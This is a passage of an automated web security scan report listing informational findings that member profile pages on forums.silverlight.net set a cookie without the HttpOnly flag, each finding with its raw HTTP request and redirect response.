<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2falt_5F00_fo
...[SNIP]...

17.231. http://forums.silverlight.net/members/billb08.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/billb08.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:10 GMT; expires=Sun, 29-Jan-2012 23:17:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/billb08.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:10 GMT; expires=Sun, 29-Jan-2012 23:17:10 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:11 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbillb08.asp
...[SNIP]...

17.232. http://forums.silverlight.net/members/bradsevertson.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/bradsevertson.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/bradsevertson.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradsevertson.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:34 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbradseverts
...[SNIP]...

17.233. http://forums.silverlight.net/members/brucemcmillan.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/brucemcmillan.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/brucemcmillan.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmillan.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:22 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fbrucemcmill
...[SNIP]...

17.234. http://forums.silverlight.net/members/clintong.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/clintong.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:36 GMT; expires=Sun, 29-Jan-2012 23:16:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/clintong.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:36 GMT; expires=Sun, 29-Jan-2012 23:16:36 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:36 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fclintong.as
...[SNIP]...

17.235. http://forums.silverlight.net/members/dhook.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/dhook.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/dhook.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 233
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:21 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fdhook.aspx"
...[SNIP]...

17.236. http://forums.silverlight.net/members/emil.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/emil.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/emil.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 232
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:03 GMT; expires=Sun, 29-Jan-2012 23:16:03 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:04 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2femil.aspx">
...[SNIP]...

17.237. http://forums.silverlight.net/members/gary-frank.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/gary-frank.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:20 GMT; expires=Sun, 29-Jan-2012 23:41:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/gary-frank.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:20 GMT; expires=Sun, 29-Jan-2012 23:41:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fgary-frank.
...[SNIP]...

17.238. http://forums.silverlight.net/members/houmie.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/houmie.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/houmie.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:21 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx
...[SNIP]...

17.239. http://forums.silverlight.net/members/ilektrik.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/ilektrik.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:28 GMT; expires=Sun, 29-Jan-2012 23:16:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/ilektrik.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 236
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:28 GMT; expires=Sun, 29-Jan-2012 23:16:28 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:28 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.as
...[SNIP]...

17.240. http://forums.silverlight.net/members/jamlew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/jamlew.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jamlew.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 234
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:08 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx
...[SNIP]...

17.241. http://forums.silverlight.net/members/jerry-weng-_2D00_-msft.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/jerry-weng-_2D00_-msft.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jerry-weng-_2D00_-msft.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 250
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng-_2D00_-msft.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng-
...[SNIP]...

17.242. http://forums.silverlight.net/members/jesseliberty.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/jesseliberty.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jesseliberty.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 240
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesseliberty.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:37 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesselibert
...[SNIP]...

17.243. http://forums.silverlight.net/members/jimpoteet.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/jimpoteet.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/jimpoteet.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.a
...[SNIP]...

17.244. http://forums.silverlight.net/members/jperl.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/members/jperl.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:15 GMT; expires=Sun, 29-Jan-2012 23:16:15 GMT; path=/

